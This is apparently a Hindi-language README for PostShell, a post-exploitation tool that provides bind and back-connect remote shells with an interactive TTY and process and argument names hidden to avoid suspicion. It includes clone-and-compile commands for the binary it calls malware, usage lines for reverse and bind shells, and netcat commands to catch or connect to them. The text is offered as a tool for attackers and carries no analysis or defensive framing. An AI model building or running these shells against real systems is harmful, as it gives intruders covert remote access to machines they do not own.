
PostShell - पोस्ट-एक्सप्लॉइटेशन बाइंड/बैककनेक्ट शेल
PostShell एक पोस्ट-एक्सप्लॉइटेशन शेल है जिसमें बाइंड और बैक कनेक्ट दोनों प्रकार के शेल शामिल हैं। यह एक पूरी तरह से इंटरैक्टिव TTY बनाता है जो जॉब कंट्रोल की अनुमति देता है। स्टब का आकार लगभग 14kb होता है और इसे किसी भी यूनिक्स जैसी प्रणाली पर कंपाइल किया जा सकता है।
कनेक्शन शुरू होने के बाद बैनर और शेल के साथ इंटरैक्शन।
PostShell पायथन और पर्ल जैसी निर्भरताओं पर हमलावर की निर्भरता कम करके आसान पोस्ट-एक्सप्लॉइटेशन की अनुमति देता है। यह बैक कनेक्ट और बाइंड शेल दोनों को शामिल करता है, जिसका अर्थ है कि यदि लक्ष्य आउटगोइंग कनेक्शन की अनुमति नहीं देता है, तो एक ऑपरेटर आसानी से बाइंड शेल शुरू कर सकता है और मशीन से दूरस्थ रूप से कनेक्ट कर सकता है। PostShell पारंपरिक शेल की तुलना में काफी कम संदेहास्पद है क्योंकि प्रक्रियाओं और तर्कों दोनों के नाम छिपाए जाते हैं।
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
इससे "stub" नामक एक बाइनरी बननी चाहिए - यह मैलवेयर है।$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
बैककनेक्ट:
$ ./stub 127.0.0.1 13377
बाइंड शेल:
$ ./stub 13377
बैककनेक्ट प्राप्त करना:
$ nc -vlp port
बाइंड शेल से कनेक्ट करना:
$ nc host port